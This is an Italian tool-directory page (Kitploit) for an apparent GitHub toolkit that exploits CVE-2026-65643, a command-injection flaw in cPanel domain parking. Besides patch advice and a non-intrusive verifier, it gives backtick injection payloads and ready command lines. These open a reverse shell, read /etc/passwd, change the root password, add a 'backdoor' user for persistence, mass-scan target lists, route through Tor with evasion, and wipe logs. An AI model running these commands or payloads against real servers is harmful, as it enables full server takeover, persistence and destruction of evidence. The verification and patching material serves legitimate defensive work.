Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-65643-PoC-Toolkit — Toolkit Red/Blue team per CVE-2026-65643, una RCE sul domain parking di cPanel. Include exploit con reverse shell, webshell, persistenza e scansione di massa, oltre a un verificatore non intrusivo per rilevamento e audit. | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-65643-poc-toolkit
Escalation di PrivilegiScanner di VulnerabilitàMeccanismi di PersistenzaExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingCommand and ControlRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sviluppo Payload
GitHubtc4dy/cve-2026-65643-poc-toolkit

CVE-2026-65643-PoC-Toolkit

Toolkit Red/Blue team per CVE-2026-65643, una RCE sul domain parking di cPanel. Include exploit con reverse shell, webshell, persistenza e scansione di massa, oltre a un verificatore non intrusivo per rilevamento e audit.

Vedi Repository
1 giorno faNon ancora revisionato

CVEPoC

CVE‑2026‑65643 – Toolkit RCE per Domain Parking in cPanel

Python 3.8+ CVSS Author cPanel

⚠️ SOLO USO ETICO – TEST DI SICUREZZA AUTORIZZATI
Questo repository fornisce strumenti esclusivamente per professionisti della sicurezza autorizzati, blue team e penetration tester.
L'accesso non autorizzato a sistemi informatici è illegale ai sensi del CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Turchia) e leggi simili in tutto il mondo.


📖 Panoramica della Vulnerabilità

CVE‑2026‑65643 è una vulnerabilità critica di injection di comandi in cPanel & WHM versioni 11.x che consente a un utente cPanel autenticato di eseguire comandi di sistema arbitrari con privilegi di root tramite la funzionalità di domain parking.

Come funziona

  1. È richiesto accesso autenticato – l'attaccante deve disporre di un account cPanel valido (nome utente/password) sul server di destinazione.
  2. Injection nel domain parking – quando si aggiunge un dominio parcheggiato, il nome di dominio non viene adeguatamente sanificato, consentendo all'attaccante di iniettare comandi shell utilizzando backtick (`).
  3. Esecuzione del comando – il comando iniettato viene eseguito dal sistema con i privilegi dell'utente cPanel, che possono essere elevati a root tramite tecniche di privilege escalation.
  4. Privilegi di root – poiché l'operazione di domain parking viene eseguita con permessi sufficienti, comandi arbitrari possono essere eseguiti con privilegi elevati.
  5. Impatto – compromissione totale del server, furto di dati, backdoor, ransomware e movimento laterale. Aggiornare immediatamente!

Versioni Interessate

  • cPanel & WHM 11.110.0.140 e precedenti – vulnerabili
  • 11.134.0.52 e precedenti – vulnerabili
  • 11.136.0.36 e precedenti – vulnerabili
  • 11.138.0.1 e precedenti – vulnerabili
  • 11.138.1.6 e successive – corrette

Patch

  • Aggiornare a cPanel & WHM 11.138.1.6, 11.138.0.2, 11.136.0.37, 11.134.0.53 o 11.110.0.141 o versioni successive.
  • Se l'aggiornamento non è possibile, disabilitare i permessi di domain parking per gli utenti cPanel come soluzione temporanea.

🧰 Strumenti

StrumentoScopoUtente Previsto
exploit.pyToolkit completo armato con reverse shell, webshell, persistenza, lettura/scrittura file, cambio password root, scansione di massa, supporto Tor e funzionalità OPSEC.

📊 Confronto Funzionalità


🎯 Riepilogo Casi d'Uso


⚙️ Installazione

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-65643-Toolkit
cd CVE-2026-65643-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3

📋 Parametri

Parametri di exploit.py

Parametri di verifier.py


💥 Scenari


🧪 Endpoint e Metodi di Injection

Lo strumento utilizza i seguenti endpoint e metodi di injection di cPanel:

Formato Payload

root@kitploit:~
# Formato payload di injection
test.com`<comando>`

# Esempio
test.com`id`
test.com`whoami`
test.com`echo 'pwned' > /tmp/pwned`

🛡️ Uso Responsabile

  • Utilizzare questi strumenti solo su sistemi di cui si è proprietari o per i quali si dispone di esplicita autorizzazione scritta per il test.
  • L'accesso non autorizzato è illegale e non etico.
  • Gli autori non sono responsabili di qualsiasi uso improprio.
  • Rispettare sempre le leggi e i regolamenti del proprio paese.

Questo software è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.

Scarica lo strumento
Red team / pentester autorizzati
verifier.pyVerificatore di vulnerabilità non intrusivo che rileva la versione di cPanel, valida l'injection e valuta il rischio senza eseguire alcun payload dannoso. Genera report dettagliati.Blue team / auditor di sicurezza
Funzionalitàexploit.pyverifier.py
Rilevamento vulnerabilità✅✅
Rilevamento versione (4 endpoint)✅✅
Injection di comandi✅❌
Reverse shell✅❌
Upload WebShell✅❌
Persistenza (creazione utente cPanel)✅❌
Cambio password root✅❌
Lettura/scrittura file✅❌
4 metodi di injection (JSON/Form/CGI/API2)✅✅
Supporto Tor (anonimato)✅❌
Rotazione User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
Scansione di massa (multi‑thread)✅❌
Shell interattiva✅❌
Modalità non intrusiva (sicura)❌✅
Registrazione timeline✅✅
Report HTML✅❌
Report JSON✅✅
Pulizia log (anti‑forense)✅✅
Supporto proxy✅✅
User‑Agent personalizzato✅✅
Controllo verifica SSL✅✅
ScenarioStrumento Consigliato
Blue Team – verifica se la propria installazione cPanel è vulnerabileverifier.py
Audit di Sicurezza – valutazione della vulnerabilità non intrusivaverifier.py
Red Team – penetration testing autorizzato con sfruttamento completoexploit.py
Bug Bounty – test di divulgazione responsabileverifier.py
Scansione di Massa – verifica di più target per la vulnerabilitàexploit.py (solo rilevamento)
Risposta agli Incidenti – verifica se i sistemi sono compromessiverifier.py
ParametroDescrizione
-t, --targetURL cPanel di destinazione (es. https://cpanel.example.com:2083)
-l, --target-fileFile contenente l'elenco dei target (uno per riga) per la scansione di massa
-u, --usernameNome utente cPanel
-P, --passwordPassword cPanel
-p, --portSovrascrive la porta cPanel (predefinita dall'URL o 2083)
--threadsNumero di thread per multi‑target (predefinito: 10)
-o, --outputSalva il report JSON in un file
--html-reportSalva il report HTML in un file
-v, --verboseOutput dettagliato
--proxyProxy HTTP/HTTPS (es. http://127.0.0.1:8080)
--torInstrada attraverso Tor (localhost:9050)
-ua, --user-agentUser‑Agent personalizzato
--no-keep-aliveNon mantenere la sessione attiva
--delayRitardo tra le richieste (predefinito: 2.0s)
--jitterJitter casuale (0‑1 sec) tra le richieste (predefinito: 0.5)
--max-retriesNumero massimo di tentativi (predefinito: 5)
--ssl-verifyVerifica i certificati SSL
--timeoutTimeout della richiesta (predefinito: 15s)
--cmdEsegue un singolo comando sul target
--reverse-shellReverse shell IP:PORT
--passwdCambia la password di root
--adduserCrea un utente cPanel (UTENTE DOMINIO PASSWORD)
--readLegge un file
--writeScrive un file (specificare il percorso)
--write-contentContenuto da scrivere
--cleanupPulisce log e cronologia dopo lo sfruttamento
-i, --interactiveShell interattiva dopo lo sfruttamento
--domain-suffixSuffisso per il dominio parcheggiato (predefinito: exploit.local)
ParametroDescrizione
-t, --targetURL cPanel di destinazione (es. https://cpanel.example.com:2083)
-u, --usernameNome utente cPanel
-P, --passwordPassword cPanel
-o, --outputSalva il report JSON in un file
-v, --verboseOutput dettagliato
--proxyProxy HTTP/HTTPS (es. http://127.0.0.1:8080)
--torInstrada attraverso Tor (localhost:9050)
--ssl-verifyVerifica i certificati SSL
--timeoutTimeout della richiesta (predefinito: 15s)
--cleanupPulisce i log dopo il test
#ScenarioComando
1Verifica rapida della vulnerabilitàpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass
2Scansione dettagliata con reportpython verifier.py -t https://cpanel.example.com:2083 -u user -P pass -o report.json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Esecuzione comandopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cmd "whoami"
5Lettura file sensibilepython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Cambio password rootpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Creazione nuovo utente cPanel (persistenza)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell interattiva dopo lo sfruttamentopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Scansione di massa da filepython exploit.py -l targets.txt -u user -P pass --threads 20 -o results.json
10Uso di proxy, Tor e User‑Agent personalizzatopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 --tor -ua "Mozilla/5.0"
11Pulizia log dopo lo sfruttamentopython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --cleanup
MetodoEndpointDescrizione
API JSON/cpsessXXXXX/json-api/domainMetodo di injection primario tramite payload JSON
Dati Form/cpsessXXXXX/json-api/domainInjection alternativa tramite dati codificati in form
Script CGI/cgi-sys/domainpark.cgiInjection su endpoint CGI legacy
API2/cpsessXXXXX/json-api/cpanelMetodo di injection API2 legacy